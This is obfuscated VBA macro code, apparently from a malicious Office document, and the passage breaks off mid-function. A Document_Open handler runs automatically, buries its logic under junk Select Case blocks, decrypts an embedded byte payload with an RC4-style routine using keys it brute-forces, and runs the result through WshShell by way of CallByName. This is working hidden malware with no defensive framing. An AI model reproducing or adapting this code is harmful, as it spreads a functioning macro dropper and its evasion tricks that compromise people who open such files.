Select Case AjuAPK
Case 19
AjuAPK = AjuAPK + 1
Case 19
AjuAPK = AjuAPK + AjuAPK
Case Else
AjuAPK = AjuAPK - 1
End Select
For XLBuS = 0 To 2035
JCG(XLBuS) = J6(XLBuS)
Next XLBuS
Dim Li1LrM As String, X7 As Long, PExBU As String, ELgh As String, RvpURw As String, O2Esz As String, ANdMl As String, YnTQJKM As String, FLl5() As Byte
WHKQ = 71
Select Case WHKQ
Case 60
WHKQ = WHKQ + 1
Case 95
WHKQ = WHKQ + WHKQ
Case Else
WHKQ = WHKQ - 1
End Select
ApLjBgX = 74
Select Case ApLjBgX
Case 18
ApLjBgX = ApLjBgX + 1
Case 60
ApLjBgX = ApLjBgX + ApLjBgX
Case Else
ApLjBgX = ApLjBgX - 1
End Select
Dim S6RO47(15) As Byte, DVrr(40) As Byte
Y9 = 81
Select Case Y9
Case 71
Y9 = Y9 + 1
Case 28
Y9 = Y9 + Y9
Case Else
Y9 = Y9 - 1
End Select
S6RO47(0) = 174
S6RO47(1) = 163
S6RO47(2) = 206
S6RO47(3) = 156
S6RO47(4) = 3
S6RO47(5) = 63
S6RO47(6) = 172
S6RO47(7) = 137
S6RO47(8) = 254
S6RO47(9) = 158
S6RO47(10) = 250
S6RO47(11) = 35
S6RO47(12) = 84
S6RO47(13) = 228
S6RO47(14) = 217
S6RO47(15) = 10
VBiX = 20
Select Case VBiX
Case 29
VBiX = VBiX + 1
Case 1
VBiX = VBiX + VBiX
Case Else
VBiX = VBiX - 1
End Select
DVrr(0) = 67
DVrr(1) = 84
DVrr(2) = 71
DVrr(3) = 116
DVrr(4) = 65
DVrr(5) = 74
DVrr(6) = 103
DVrr(7) = 65
DVrr(8) = 106
DVrr(9) = 69
DVrr(10) = 74
DVrr(11) = 85
DVrr(12) = 56
DVrr(13) = 81
DVrr(14) = 83
DVrr(15) = 85
DVrr(16) = 56
DVrr(17) = 107
DVrr(18) = 100
DVrr(19) = 86
DVrr(20) = 65
QC3Jjpe = 44
Select Case QC3Jjpe
Case 95
QC3Jjpe = QC3Jjpe + 1
Case 67
QC3Jjpe = QC3Jjpe + QC3Jjpe
Case Else
QC3Jjpe = QC3Jjpe - 1
End Select
For X7 = VJr(CHIq5Xv) To VJr(TD9j)
DVrr(21) = Ow8Nblf(X7, 1)
DVrr(22) = Ow8Nblf(X7, 2)
DVrr(23) = Ow8Nblf(X7, 3)
DVrr(24) = Ow8Nblf(X7, 4)
DVrr(25) = DVrr(21)
DVrr(26) = DVrr(22)
DVrr(27) = DVrr(23)
DVrr(28) = DVrr(24)
DVrr(29) = DVrr(21)
DVrr(30) = DVrr(22)
DVrr(31) = DVrr(23)
DVrr(32) = DVrr(24)
DVrr(33) = DVrr(21)
DVrr(34) = DVrr(22)
DVrr(35) = DVrr(23)
DVrr(36) = DVrr(24)
DVrr(37) = DVrr(21)
DVrr(38) = DVrr(22)
DVrr(39) = DVrr(23)
DVrr(40) = DVrr(24)
If Qae(S6RO47, DVrr) = "BplrZDlWkjLGtr3A" Then Exit For
Next X7
Rqu71d = 78
Select Case Rqu71d
Case 19
Rqu71d = Rqu71d + 1
Case 44
Rqu71d = Rqu71d + Rqu71d
Case Else
Rqu71d = Rqu71d - 1
End Select
Dim I0m(13) As Byte, WXL(32) As Byte
KdPRB = 89
Select Case KdPRB
Case 49
KdPRB = KdPRB + 1
Case 95
KdPRB = KdPRB + KdPRB
Case Else
KdPRB = KdPRB - 1
End Select
I0m(0) = 36
I0m(1) = 84
I0m(2) = 65
I0m(3) = 94
I0m(4) = 32
I0m(5) = 145
I0m(6) = 48
I0m(7) = 85
I0m(8) = 169
I0m(9) = 9
I0m(10) = 134
I0m(11) = 41
I0m(12) = 87
I0m(13) = 179
AvrGO = 57
Select Case AvrGO
Case 45
AvrGO = AvrGO + 1
Case 80
AvrGO = AvrGO + AvrGO
Case Else
AvrGO = AvrGO - 1
End Select
WXL(0) = 67
WXL(1) = 86
WXL(2) = 109
WXL(3) = 83
WXL(4) = 66
WXL(5) = 72
WXL(6) = 82
WXL(7) = 54
WXL(8) = 104
WXL(9) = 55
WXL(10) = 102
WXL(11) = 72
WXL(12) = 89
Nxrk = 54
Select Case Nxrk
Case 94
Nxrk = Nxrk + 1
Case 97
Nxrk = Nxrk + Nxrk
Case Else
Nxrk = Nxrk - 1
End Select
For X7 = VJr(CHIq5Xv) To VJr(TD9j)
WXL(13) = Ow8Nblf(X7, 1)
WXL(14) = Ow8Nblf(X7, 2)
WXL(15) = Ow8Nblf(X7, 3)
WXL(16) = Ow8Nblf(X7, 4)
WXL(17) = WXL(13)
WXL(18) = WXL(14)
WXL(19) = WXL(15)
WXL(20) = WXL(16)
WXL(21) = WXL(13)
WXL(22) = WXL(14)
WXL(23) = WXL(15)
WXL(24) = WXL(16)
WXL(25) = WXL(13)
WXL(26) = WXL(14)
WXL(27) = WXL(15)
WXL(28) = WXL(16)
WXL(29) = WXL(13)
WXL(30) = WXL(14)
WXL(31) = WXL(15)
WXL(32) = WXL(16)
If Qae(I0m, WXL) = "VLtfpFt0xOW0jT" Then Exit For
Next X7
GZ = 79
Select Case GZ
Case 18
GZ = GZ + 1
Case 29
GZ = GZ + GZ
Case Else
GZ = GZ - 1
End Select
Dim WtwCQ(15) As Byte, UnJ(31) As Byte
VQQz = 69
Select Case VQQz
Case 60
VQQz = VQQz + 1
Case 61
VQQz = VQQz + VQQz
Case Else
VQQz = VQQz - 1
End Select
WtwCQ(0) = 231
WtwCQ(1) = 15
WtwCQ(2) = 98
WtwCQ(3) = 52
WtwCQ(4) = 24
WtwCQ(5) = 145
WtwCQ(6) = 90
WtwCQ(7) = 13
WtwCQ(8) = 124
WtwCQ(9) = 71
WtwCQ(10) = 127
WtwCQ(11) = 235
WtwCQ(12) = 80
WtwCQ(13) = 73
WtwCQ(14) = 68
WtwCQ(15) = 155
SEZW = 71
Select Case SEZW
Case 29
SEZW = SEZW + 1
Case 80
SEZW = SEZW + SEZW
Case Else
SEZW = SEZW - 1
End Select
UnJ(0) = 89
UnJ(1) = 68
UnJ(2) = 52
UnJ(3) = 76
UnJ(4) = 67
UnJ(5) = 80
UnJ(6) = 118
UnJ(7) = 111
UnJ(8) = 89
UnJ(9) = 49
UnJ(10) = 77
UnJ(11) = 49
Br6 = 12
Select Case Br6
Case 60
Br6 = Br6 + 1
Case 89
Br6 = Br6 + Br6
Case Else
Br6 = Br6 - 1
End Select
For X7 = VJr(CHIq5Xv) To VJr(TD9j)
UnJ(12) = Ow8Nblf(X7, 1)
UnJ(13) = Ow8Nblf(X7, 2)
UnJ(14) = Ow8Nblf(X7, 3)
UnJ(15) = Ow8Nblf(X7, 4)
UnJ(16) = UnJ(12)
UnJ(17) = UnJ(13)
UnJ(18) = UnJ(14)
UnJ(19) = UnJ(15)
UnJ(20) = UnJ(12)
UnJ(21) = UnJ(13)
UnJ(22) = UnJ(14)
UnJ(23) = UnJ(15)
UnJ(24) = UnJ(12)
UnJ(25) = UnJ(13)
UnJ(26) = UnJ(14)
UnJ(27) = UnJ(15)
UnJ(28) = UnJ(12)
UnJ(29) = UnJ(13)
UnJ(30) = UnJ(14)
UnJ(31) = UnJ(15)
If Qae(WtwCQ, UnJ) = "D36jTDxZBNLVo09c" Then Exit For
Next X7
MLSpG = 96
Select Case MLSpG
Case 45
MLSpG = MLSpG + 1
Case 73
MLSpG = MLSpG + MLSpG
Case Else
MLSpG = MLSpG - 1
End Select
Dim Kqg(15) As Byte, Wd(30) As Byte
VmGia = 60
Select Case VmGia
Case 26
VmGia = VmGia + 1
Case 4
VmGia = VmGia + VmGia
Case Else
VmGia = VmGia - 1
End Select
Kqg(0) = 7
Kqg(1) = 8
Kqg(2) = 138
Kqg(3) = 234
Kqg(4) = 220
Kqg(5) = 99
Kqg(6) = 92
Kqg(7) = 159
Kqg(8) = 32
Kqg(9) = 234
Kqg(10) = 247
Kqg(11) = 51
Kqg(12) = 219
Kqg(13) = 242
Kqg(14) = 180
Kqg(15) = 224
V0D = 93
Select Case V0D
Case 14
V0D = V0D + 1
Case 80
V0D = V0D + V0D
Case Else
V0D = V0D - 1
End Select
Wd(0) = 68
Wd(1) = 98
Wd(2) = 101
Wd(3) = 70
Wd(4) = 106
Wd(5) = 56
Wd(6) = 82
Wd(7) = 65
Wd(8) = 105
Wd(9) = 53
Wd(10) = 101
YSno = 56
Select Case YSno
Case 53
YSno = YSno + 1
Case 8
YSno = YSno + YSno
Case Else
YSno = YSno - 1
End Select
For X7 = VJr(CHIq5Xv) To VJr(TD9j)
Wd(11) = Ow8Nblf(X7, 1)
Wd(12) = Ow8Nblf(X7, 2)
Wd(13) = Ow8Nblf(X7, 3)
Wd(14) = Ow8Nblf(X7, 4)
Wd(15) = Wd(11)
Wd(16) = Wd(12)
Wd(17) = Wd(13)
Wd(18) = Wd(14)
Wd(19) = Wd(11)
Wd(20) = Wd(12)
Wd(21) = Wd(13)
Wd(22) = Wd(14)
Wd(23) = Wd(11)
Wd(24) = Wd(12)
Wd(25) = Wd(13)
Wd(26) = Wd(14)
Wd(27) = Wd(11)
Wd(28) = Wd(12)
Wd(29) = Wd(13)
Wd(30) = Wd(14)
If Qae(Kqg, Wd) = "Ne7MBi0DsECDXbhA" Then Exit For
Next X7
VaHf = 36
Select Case VaHf
Case 70
VaHf = VaHf + 1
Case 21
VaHf = VaHf + VaHf
Case Else
VaHf = VaHf - 1
End Select
Jd = 28
Select Case Jd
Case 49
Jd = Jd + 1
Case 60
Jd = Jd + Jd
Case Else
Jd = Jd - 1
End Select
Dim Ueqz3 As Long, FDoxtL0 As Long, DTlOCAk As Long, CjjoWz As Long, RcDQe(4074) As Byte, JSzW3 As Long, VQ As String
X6MJC = 45
Select Case X6MJC
Case 37
X6MJC = X6MJC + 1
Case 60
X6MJC = X6MJC + X6MJC
Case Else
X6MJC = X6MJC - 1
End Select
For Ueqz3 = 0 To VJr(JCG)
Lr8ap2 = 97
Select Case Lr8ap2
Case 54
Lr8ap2 = Lr8ap2 + 1
Case 57
Lr8ap2 = Lr8ap2 + Lr8ap2
Case Else
Lr8ap2 = Lr8ap2 - 1
End Select
For FDoxtL0 = 1 To 2
OwMB = 19
Select Case OwMB
Case 5
OwMB = OwMB + 1
Case 89
OwMB = OwMB + OwMB
Case Else
OwMB = OwMB - 1
End Select
If DTlOCAk = 1 Then
KLag5B = 21
Select Case KLag5B
Case 69
KLag5B = KLag5B + 1
Case 25
KLag5B = KLag5B + KLag5B
Case Else
KLag5B = KLag5B - 1
End Select
RcDQe(CjjoWz) = Xpg(JCG(JSzW3))(DTlOCAk)
Stg3M = 5
Select Case Stg3M
Case 45
Stg3M = Stg3M + 1
Case 70
Stg3M = Stg3M + Stg3M
Case Else
Stg3M = Stg3M - 1
End Select
Else
RKhuK6 = 54
Select Case RKhuK6
Case 80
RKhuK6 = RKhuK6 + 1
Case 29
RKhuK6 = RKhuK6 + RKhuK6
Case Else
RKhuK6 = RKhuK6 - 1
End Select
DTlOCAk = 0
KD = 70
Select Case KD
Case 6
KD = KD + 1
Case 44
KD = KD + KD
Case Else
KD = KD - 1
End Select
RcDQe(CjjoWz) = Xpg(JCG(JSzW3))(DTlOCAk)
WWEti = 84
Select Case WWEti
Case 29
WWEti = WWEti + 1
Case 70
WWEti = WWEti + WWEti
Case Else
WWEti = WWEti - 1
End Select
End If
BzzSbf = 27
Select Case BzzSbf
Case 49
BzzSbf = BzzSbf + 1
Case 81
BzzSbf = BzzSbf + BzzSbf
Case Else
BzzSbf = BzzSbf - 1
End Select
CjjoWz = CjjoWz + 1
NkuXIMa = 76
Select Case NkuXIMa
Case 66
NkuXIMa = NkuXIMa + 1
Case 23
NkuXIMa = NkuXIMa + NkuXIMa
Case Else
NkuXIMa = NkuXIMa - 1
End Select
DTlOCAk = DTlOCAk + 1
Fzn8V = 24
Select Case Fzn8V
Case 95
Fzn8V = Fzn8V + 1
Case 82
Fzn8V = Fzn8V + Fzn8V
Case Else
Fzn8V = Fzn8V - 1
End Select
Next FDoxtL0
I9Nont = 39
Select Case I9Nont
Case 64
I9Nont = I9Nont + 1
Case 62
I9Nont = I9Nont + I9Nont
Case Else
I9Nont = I9Nont - 1
End Select
JSzW3 = JSzW3 + 1
NE8 = 84
Select Case NE8
Case 54
NE8 = NE8 + 1
Case 19
NE8 = NE8 + NE8
Case Else
NE8 = NE8 - 1
End Select
Next Ueqz3
T2 = 73
Select Case T2
Case 73
T2 = T2 + 1
Case 48
T2 = T2 + T2
Case Else
T2 = T2 - 1
End Select
Dim Jl(136) As Byte, TPs3 As Long, GiCi As Long
GL = 73
Select Case GL
Case 1
GL = GL + 1
Case 65
GL = GL + GL
Case Else
GL = GL - 1
End Select
TPs3 = 0
I7bW6 = 51
Select Case I7bW6
Case 94
I7bW6 = I7bW6 + 1
Case 37
I7bW6 = I7bW6 + I7bW6
Case Else
I7bW6 = I7bW6 - 1
End Select
GiCi = 0
N7UXm8G = 1
Select Case N7UXm8G
Case 30
N7UXm8G = N7UXm8G + 1
Case 44
N7UXm8G = N7UXm8G + N7UXm8G
Case Else
N7UXm8G = N7UXm8G - 1
End Select
For X7 = 0 To VJr(DVrr)
Jl(X7) = DVrr(X7)
TPs3 = TPs3 + 1
Next X7
C7cAcJ = 92
Select Case C7cAcJ
Case 55
C7cAcJ = C7cAcJ + 1
Case 67
C7cAcJ = C7cAcJ + C7cAcJ
Case Else
C7cAcJ = C7cAcJ - 1
End Select
For X7 = VJr(DVrr) + 1 To VJr(WXL) + TPs3
Jl(X7) = WXL(GiCi)
GiCi = GiCi + 1
TPs3 = TPs3 + 1
Next X7
PBs = 19
Select Case PBs
Case 36
PBs = PBs + 1
Case 37
PBs = PBs + PBs
Case Else
PBs = PBs - 1
End Select
GiCi = 0
PuOwZI = 75
Select Case PuOwZI
Case 20
PuOwZI = PuOwZI + 1
Case 33
PuOwZI = PuOwZI + PuOwZI
Case Else
PuOwZI = PuOwZI - 1
End Select
For X7 = TPs3 To VJr(UnJ) + TPs3
Jl(X7) = UnJ(GiCi)
GiCi = GiCi + 1
TPs3 = TPs3 + 1
Next X7
MrF = 44
Select Case MrF
Case 25
MrF = MrF + 1
Case 30
MrF = MrF + MrF
Case Else
MrF = MrF - 1
End Select
GiCi = 0
W2 = 87
Select Case W2
Case 68
W2 = W2 + 1
Case 51
W2 = W2 + W2
Case Else
W2 = W2 - 1
End Select
For X7 = TPs3 To VJr(Wd) + TPs3
Jl(X7) = Wd(GiCi)
GiCi = GiCi + 1
TPs3 = TPs3 + 1
Next X7
Yg3 = 87
Select Case Yg3
Case 8
Yg3 = Yg3 + 1
Case 48
Yg3 = Yg3 + Yg3
Case Else
Yg3 = Yg3 - 1
End Select
FLl5 = RcDQe
Ocp = 45
Select Case Ocp
Case 80
Ocp = Ocp + 1
Case 30
Ocp = Ocp + Ocp
Case Else
Ocp = Ocp - 1
End Select
ReDim Preserve FLl5(4070)
USd6tJ = 60
Select Case USd6tJ
Case 48
USd6tJ = USd6tJ + 1
Case 83
USd6tJ = USd6tJ + USd6tJ
Case Else
USd6tJ = USd6tJ - 1
End Select
VQ = Qae(FLl5, Jl)
USssG = 69
Select Case USssG
Case 75
USssG = USssG + 1
Case 4
USssG = USssG + USssG
Case Else
USssG = USssG - 1
End Select
Cb6n = 57
Select Case Cb6n
Case 70
Cb6n = Cb6n + 1
Case 84
Cb6n = Cb6n + Cb6n
Case Else
Cb6n = Cb6n - 1
End Select
JHGCd = 62
Select Case JHGCd
Case 67
JHGCd = JHGCd + 1
Case 51
JHGCd = JHGCd + JHGCd
Case Else
JHGCd = JHGCd - 1
End Select
Dim LEZY As New WshShell
BR8prCo = 25
Select Case BR8prCo
Case 7
BR8prCo = BR8prCo + 1
Case 88
BR8prCo = BR8prCo + BR8prCo
Case Else
BR8prCo = BR8prCo - 1
End Select
Dim LIaWGb(2) As Byte, FX9(3) As Byte
T4AWhuk = 22
Select Case T4AWhuk
Case 55
T4AWhuk = T4AWhuk + 1
Case 28
T4AWhuk = T4AWhuk + T4AWhuk
Case Else
T4AWhuk = T4AWhuk - 1
End Select
LIaWGb(0) = 247
LIaWGb(1) = 194
LIaWGb(2) = 231
SaC = 2
Select Case SaC
Case 16
SaC = SaC + 1
Case 19
SaC = SaC + SaC
Case Else
SaC = SaC - 1
End Select
FX9(0) = 87
FX9(1) = 75
FX9(2) = 78
FX9(3) = 122
CallByName LEZY, Qae(LIaWGb, FX9), 7487 - 7486, VQ, 7955 - 7955, 9516 - 9516
YzdTw3o = 85
Select Case YzdTw3o
Case 76
YzdTw3o = YzdTw3o + 1
Case 77
YzdTw3o = YzdTw3o + YzdTw3o
Case Else
YzdTw3o = YzdTw3o - 1
End Select
End Sub
Private Sub OI1uV()
O62rU = 68
Select Case O62rU
Case 7
O62rU = O62rU + 1
Case 12
O62rU = O62rU + O62rU
Case Else
O62rU = O62rU - 1
End Select
Y7FTeZg = 23
Select Case Y7FTeZg
Case 77
Y7FTeZg = Y7FTeZg + 1
Case 86
Y7FTeZg = Y7FTeZg + Y7FTeZg
Case Else
Y7FTeZg = Y7FTeZg - 1
End Select
End Sub
Private Function Qae(PQgR() As Byte, PAx() As Byte) As String
S2P = 32
Select Case S2P
Case 48
S2P = S2P + 1
Case 72
S2P = S2P + S2P
Case Else
S2P = S2P - 1
End Select
On Error Resume Next
DfiX = 56
Select Case DfiX
Case 63
DfiX = DfiX + 1
Case 14
DfiX = DfiX + DfiX
Case Else
DfiX = DfiX - 1
End Select
Dim Tf(0 To 255) As Integer, WzkPKl As Long, KQSJL7 As Long, NYGeA5Y As Long, PaY5Q7 As Byte, KKbe6J() As Byte, LoE4TuI() As Byte
LJZZ6 = 23
Select Case LJZZ6
Case 73
LJZZ6 = LJZZ6 + 1
Case 95
LJZZ6 = LJZZ6 + LJZZ6
Case Else
LJZZ6 = LJZZ6 - 1
End Select
ReDim KKbe6J(VJr(PQgR)) As Byte
JHH8q3 = 31
Select Case JHH8q3
Case 51
JHH8q3 = JHH8q3 + 1
Case 62
JHH8q3 = JHH8q3 + JHH8q3
Case Else
JHH8q3 = JHH8q3 - 1
End Select
KKbe6J = PQgR
AVP = 55
Select Case AVP
Case 18
AVP = AVP + 1
Case 30
AVP = AVP + AVP
Case Else
AVP = AVP - 1
End Select
ReDim LoE4TuI(VJr(PAx)) As Byte
YTny = 11
Select Case YTny
Case 24
YTny = YTny + 1
Case 82
YTny = YTny + YTny
Case Else
YTny = YTny - 1
End Select
LoE4TuI = PAx
IU0aBM = 60
Select Case IU0aBM
Case 15
IU0aBM = IU0aBM + 1
Case 24
IU0aBM = IU0aBM + IU0aBM
Case Else
IU0aBM = IU0aBM - 1
End Select
For WzkPKl = 0 To (1657500 / 6500)
Tf(WzkPKl) = WzkPKl
Next WzkPKl
O2YzD = 62
Select Case O2YzD
Case 9
O2YzD = O2YzD + 1
Case 43
O2YzD = O2YzD + O2YzD
Case Else
O2YzD = O2YzD - 1
End Select
WzkPKl = 0
Xk0 = 77
Select Case Xk0
Case 1
Xk0 = Xk0 + 1
Case 7
Xk0 = Xk0 + Xk0
Case Else
Xk0 = Xk0 - 1
End Select
KQSJL7 = 0
JJ2Y6aR = 66
Select Case JJ2Y6aR
Case 8
JJ2Y6aR = JJ2Y6aR + 1
Case 83
JJ2Y6aR = JJ2Y6aR + JJ2Y6aR
Case Else
JJ2Y6aR = JJ2Y6aR - 1
End Select
NYGeA5Y = 0
FFtQa = 84
Select Case FFtQa
Case 64
FFtQa = FFtQa + 1
Case 26
FFtQa = FFtQa + FFtQa
Case Else
FFtQa = FFtQa - 1
End Select
For WzkPKl = 0 To (59 + 196)
KQSJL7 = Gp((KQSJL7 + Tf(WzkPKl) + LoE4TuI(Gp(WzkPKl, (VJr(PAx) + 1)))), ((2555392 / 9982)))
PaY5Q7 = Tf(WzkPKl)
Tf(WzkPKl) = Tf(KQSJL7)
Tf(KQSJL7) = PaY5Q7
Next WzkPKl
O2X2z = 79
Select Case O2X2z
Case 66
O2X2z = O2X2z + 1
Case 80
O2X2z = O2X2z + O2X2z
Case Else
O2X2z = O2X2z - 1
End Select
WzkPKl = 0
Ty6 = 37
Select Case Ty6
Case 21
Ty6 = Ty6 + 1
Case 69
Ty6 = Ty6 + Ty6
Case Else
Ty6 = Ty6 - 1
End Select
KQSJL7 = 0
IPNm = 38
Select Case IPNm
Case 31
IPNm = IPNm + 1
Case 97
IPNm = IPNm + IPNm
Case Else
IPNm = IPNm - 1
End Select
NYGeA5Y = 0
Lk6rK6 = 52
Select Case Lk6rK6
Case 89
Lk6rK6 = Lk6rK6 + 1
Case 49
Lk6rK6 = Lk6rK6 + Lk6rK6
Case Else
Lk6rK6 = Lk6rK6 - 1
End Select
For WzkPKl = 0 To VJr(PQgR)
KQSJL7 = Gp((KQSJL7 + 1), (-1245 + 1501))
NYGeA5Y = Gp((NYGeA5Y + Tf(KQSJL7)), (7617 - 7361))
PaY5Q7 = Tf(KQSJL7)
Tf(KQSJL7) = Tf(NYGeA5Y)
Tf(NYGeA5Y) = PaY5Q7
KKbe6J(WzkPKl) = K8wnxv(KKbe6J(WzkPKl), (Tf(Gp((Tf(KQSJL7) + Tf(NYGeA5Y)), ((-8600 + 8856))))))
Next WzkPKl
KYcKDU = 22
Select Case KYcKDU
Case 63
KYcKDU = KYcKDU + 1
Case 66
KYcKDU = KYcKDU + KYcKDU
Case Else
KYcKDU = KYcKDU - 1
End Select
Qae = YlOt(KKbe6J)
Nnd5 = 85
Select Case Nnd5
Case 48
Nnd5 = Nnd5 + 1
Case 86
Nnd5 = Nnd5 + Nnd5
Case Else
Nnd5 = Nnd5 - 1
End Select
End Function
Private Sub dOCUMENT_oPEN()
GZHIk = 52
Select Case GZHIk
Case 58
GZHIk = GZHIk + 1
Case 42
GZHIk = GZHIk + GZHIk
Case Else
GZHIk = GZHIk - 1
End Select
On Error Resume Next
Rqu4Egm = 96
Select Case Rqu4Egm
Case 79
Rqu4Egm = Rqu4Egm + 1
Case 6
Rqu4Egm = Rqu4Egm + Rqu4Egm
Case Else
Rqu4Egm = Rqu4Egm - 1
End Select
Dim AFQWJwT As Long, XA As Long, Lsxi7n As Long
AY = 43
Select Case AY
Case 51
AY = AY + 1
Case 1
AY = AY + AY
Case Else
AY = AY - 1
End Select
AFQWJwT = 91701
UqG07T = 93
Select Case UqG07T
Case 61
UqG07T = UqG07T + 1
Case 82
UqG07T = UqG07T + UqG07T
Case Else
UqG07T = UqG07T - 1
End Select
For XA = 1 To AFQWJwT
Lsxi7n = Lsxi7n + 1
Next XA
QkHCM = 75
Select Case QkHCM
Case 16
QkHCM = QkHCM + 1
Case 19
QkHCM = QkHCM + QkHCM
Case Else
QkHCM = QkHCM - 1
End Select
If Lsxi7n = AFQWJwT Then
Y0cYZ = 29
Select Case Y0cYZ
Case 19
Y0cYZ = Y0cYZ + 1
Case 98
Y0cYZ = Y0cYZ + Y0cYZ
Case Else
Y0cYZ = Y0cYZ - 1
End Select
Dim VtDsFWD As Integer, UQaSsug As String
For VtDsFWD = 4 To 761
UQaSsug = UQaSsug + VtDsFWD
Next
NSA = 96
Select Case NSA
Case 44
NSA = NSA + 1
Case 73
NSA = NSA + NSA
Case Else
NSA = NSA - 1
End Select
X5QjY
Else
UuM = 88
Select Case UuM
Case 54
UuM = UuM + 1
Case 32
UuM = UuM + UuM
Case Else
UuM = UuM - 1
End Select
OI1uV
XMB = 32
Select Case XMB
Case 8
XMB = XMB + 1
Case 81
XMB = XMB + XMB
Case Else
XMB = XMB - 1
End Select
End If
FZQn7 = 25
Select Case FZQn7
Case 58
FZQn7 = FZQn7 + 1
Case 31
FZQn7 = FZQn7 + FZQn7
Case Else
FZQn7 = FZQn7 - 1
End Select
End Sub
Private Function Gp(OgNCgHW, McE5A)
Gp = OgNCgHW - (McE5A * (OgNCgHW \ McE5A))
End Function
Private Function Xpg(WRFo As Integer) As Byte()
G9pW = 57
Select Case G9pW
Case 72
G9pW = G9pW + 1
Case 74
G9pW = G9pW + G9pW
Case Else
G9pW = G9pW - 1
End Select
Dim Qy2V(1) As Byte, DZd2Ry As Long, I0X As Byte
II = 73
Select Case II
Case 36
II = II + 1
Case 48
II = II + II
Case Else
II = II - 1
End Select
For DZd2Ry = 0 To 1
Qy2V(DZd2Ry) = (Int(WRFo / (2 ^ ((6270 - 6262) * (1 - DZd2Ry))))) And (-4085 + 4340)
Next DZd2Ry
T8K = 43
Select Case T8K
Case 2
T8K = T8K + 1
Case 26
T8K = T8K + T8K
Case Else
T8K = T8K - 1
End Select
ReDim Xpg(1) As Byte
IR6G = 64
Select Case IR6G
Case 4
IR6G = IR6G + 1
Case 58
IR6G = IR6G + IR6G
Case Else
IR6G = IR6G - 1
End Select
For DZd2Ry = 0 To 1 \ 2
I0X = Qy2V(DZd2Ry)
Qy2V(DZd2Ry) = Qy2V(1 - DZd2Ry)
Qy2V(1 - DZd2Ry) = I0X
Next
Paa = 38
Select Case Paa
Case 14
Paa = Paa + 1
Case 14
Paa = Paa + Paa
Case Else
Paa = Paa - 1
End Select
Xpg = Qy2V
Su = 69
Select Case Su
Case 45
Su = Su + 1
Case 19
Su = Su + Su
Case Else
Su = Su - 1
End Select
End Function
Private Function L81(ByVal CX310 As Integer) As String
TqQGWEqSM = 51
Select Case TqQGWEqSM
Case 15
TqQGWEqSM = TqQGWEqSM + 1
Case 48
TqQGWEqSM = TqQGWEqSM + TqQGWEqSM
Case Else
TqQGWEqSM = TqQGWEqSM - 1
End Select
Dim Wzorf(1) As Byte, LMV As Byte, Ky3A As Byte
T8 = 83
Select Case T8
Case 71
T8 = T8 + 1
Case 7
T8 = T8 + T8
Case Else
T8 = T8 - 1
End Select
If CX310 < 0 Then Exit Function
Rg3KRhr = 96
Select Case Rg3KRhr
Case 15
Rg3KRhr = Rg3KRhr + 1
Case 60
Rg3KRhr = Rg3KRhr + Rg3KRhr
Case Else
Rg3KRhr = Rg3KRhr - 1
End Select
If CX310 > (4037 - 3782) Then
D1H = 94
Select Case D1H
Case 9
D1H = D1H + 1
Case 67
D1H = D1H + D1H
Case Else
D1H = D1H - 1
End Select
Ky3A = 0
Else
FtGcHY = 65
Select Case FtGcHY
Case 49
FtGcHY = FtGcHY + 1
Case 97
FtGcHY = FtGcHY + FtGcHY
Case Else
FtGcHY = FtGcHY - 1
End Select
LMV = CX310
Kbum = 26
Select Case Kbum
Case 26
Kbum = Kbum + 1
Case 2
Kbum = Kbum + Kbum
Case Else
Kbum = Kbum - 1
End Select
Ky3A = 0
Taxb82z = 25
Select Case Taxb82z
Case 68
Taxb82z = Taxb82z + 1
Case 11
Taxb82z = Taxb82z + Taxb82z
Case Else
Taxb82z = Taxb82z - 1
End Select
End If
MkpEM = 82
Select Case MkpEM
Case 45
MkpEM = MkpEM + 1
Case 83
MkpEM = MkpEM + MkpEM
Case Else
MkpEM = MkpEM - 1
End Select
Wzorf(0) = LMV
JzVrwS = 15
Select Case JzVrwS
Case 13
JzVrwS = JzVrwS + 1
Case 44
JzVrwS = JzVrwS + JzVrwS
Case Else
JzVrwS = JzVrwS - 1
End Select
Wzorf(1) = Ky3A
Qo5Ddvf = 26
Select Case Qo5Ddvf
Case 65
Qo5Ddvf = Qo5Ddvf + 1
Case 46
Qo5Ddvf = Qo5Ddvf + Qo5Ddvf
Case Else
Qo5Ddvf = Qo5Ddvf - 1
End Select
L81 = Wzorf
VoJMT = 67
Select Case VoJMT
Case 40
VoJMT = VoJMT + 1
Case 48
VoJMT = VoJMT + VoJMT
Case Else
VoJMT = VoJMT - 1
End Select
End Function
Private Function Ow8Nblf(TkcJWUS As Long, S0ajpJC As Long) As Byte
QYbi = 83
Select Case QYbi
Case 6
QYbi = QYbi + 1
Case 38
QYbi = QYbi + QYbi
Case Else
QYbi = QYbi - 1
End Select
Dim QGX998 As Long, E92mH As Long
DFHgOF = 13
Select Case DFHgOF
Case 16
DFHgOF = DFHgOF + 1
Case 34
DFHgOF = DFHgOF + DFHgOF
Case Else
DFHgOF = DFHgOF - 1
End Select
For QGX998 = (459504 / 9573) To (7453 - 7396)
If KgTB0(TkcJWUS, S0ajpJC, 1) = E92mH Then Ow8Nblf = QGX998: Exit For
E92mH = E92mH + 1
Next QGX998
AlDX1 = 71
Select Case AlDX1
Case 80
AlDX1 = AlDX1 + 1
Case 52
AlDX1 = AlDX1 + AlDX1
Case Else
AlDX1 = AlDX1 - 1
End Select
End Function
Private Function K8wnxv(L4vo, I1)
TUeColT = 24
Select Case TUeColT
Case 9
TUeColT = TUeColT + 1
Case 78
TUeColT = TUeColT + TUeColT
Case Else
TUeColT = TUeColT - 1
End Select
K8wnxv = (L4vo And Not I1) Or (Not L4vo And I1)
CJbBmrD = 38
Select Case CJbBmrD
Case 91
CJbBmrD = CJbBmrD + 1
Case 30
CJbBmrD = CJbBmrD + CJbBmrD
Case Else
CJbBmrD = CJbBmrD - 1
End Select
End Function
Private Function YlOt(YTovB() As Byte) As String
Xmpet = 26
Select Case Xmpet
Case 14
Xmpet = Xmpet + 1
Case 49
Xmpet = Xmpet + Xmpet
Case Else
Xmpet = Xmpet - 1
End Select
Dim XLQ As Long
KZbQ = 93
Select Case KZbQ
Case 23
KZbQ = KZbQ + 1
Case 63
KZbQ = KZbQ + KZbQ
Case Else
KZbQ = KZbQ - 1
End Select
For XLQ = 0 To VJr(YTovB)
FnB = 7
Select Case FnB
Case 97
FnB = FnB + 1
Case 98
FnB = FnB + FnB
Case Else
FnB = FnB - 1
End Select
YlOt = YlOt & L81(YTovB(XLQ))
BbL = 18
Select Case BbL
Case 89
BbL = BbL + 1
Case 21
BbL = BbL + BbL
Case Else
BbL = BbL - 1
End Select
Next XLQ
Sqh7 = 65
Select Case Sqh7
Case 34
